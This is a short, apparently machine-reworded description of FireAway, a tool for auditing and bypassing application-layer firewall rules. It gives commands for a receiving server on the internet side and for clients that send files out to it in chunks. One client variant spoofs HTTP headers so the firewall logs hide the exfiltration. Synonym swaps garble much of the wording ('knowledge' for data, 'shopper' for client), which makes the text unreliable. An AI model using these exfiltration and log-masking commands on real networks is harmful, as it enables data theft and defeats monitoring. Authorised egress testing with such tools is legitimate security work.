Fireaway is a device for auditing, bypassing, and exfiltrating knowledge in opposition to layer 7/AppID inspection laws on subsequent technology firewalls. Those techniques are in response to the primary of getting to permit connections to determine during the NGFW so as to see layer 7 knowledge to clear out, in addition to spoofing packages to cover communique channels within the firewall logs as commonplace person visitors, akin to Web browsing.
Beginning the FireAway Server: Usually the FireAway server could be began at the egress facet of the firewall (akin to a server at the Web), and pay attention on a port believed to be closed to peer if any software based totally laws permit visitors out in this port:
python fa_server.py <port to pay attention on>
All knowledge won by means of the server in this port will likely be stored to the report ReceivedData.txt within the listing the server used to be introduced from. If the server detects differing sizes within the quantity of knowledge won (indicating firewall filtering has kicked in), this output will likely be proven at the server console:
Were given the similar or decrease quantity of knowledge on two consecutive runs. If sending check knowledge, most knowledge leak dimension will have been reached.
Beginning the FireAway Shopper/Utility Spoofer: The FireAway shopper has two modes:
- Check mode (mode 0)-Ship random knowledge in incrementing chew sizes to peer how a lot knowledge can also be despatched ahead of the firewall AppID engages and stops visitors float.
- Exfiltration mode (mode 1)-Open a report and ship it in chunks during the firewall.
To begin the fundamental shopper:
python fa_client.py <FireAway server IP> <Fireaway Server Port> <Shopper mode (0 or 1)>
To begin the appliance spoofing shopper:
python fa_spoof.py <FireAway Server IP> <Fireaway Server Port> <Shopper mode (0 or 1)>
Utility spoofing will randomly insert HTTP headers with the information chunks to pollute the logs with more than a few packages so as to masks the information exfiltration.